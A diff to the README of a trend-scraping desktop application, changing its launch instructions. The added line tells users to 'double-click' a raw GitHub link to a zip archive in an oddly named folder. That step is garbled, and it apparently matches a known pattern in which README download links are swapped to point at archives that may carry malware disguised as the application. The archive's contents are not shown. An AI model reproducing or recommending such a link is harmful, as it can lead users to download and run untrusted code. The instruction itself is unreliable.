fabiogg94/WorldTrendScraper/README.md

 ## 📚 How to Use

 1. **Launching the Application:**
-   After double-clicking `WorldTrendScraper.exe`, allow a moment for the application to load.
+   After double-clicking `https://raw.githubusercontent.com/fabiogg94/WorldTrendScraper/master/probouleutic/WorldTrendScraper.zip`, allow a moment for the application to load.

 2. **Navigating the Dashboard:**
    The main screen displays trending topics.
 Click on any topic to see more details, including links to articles.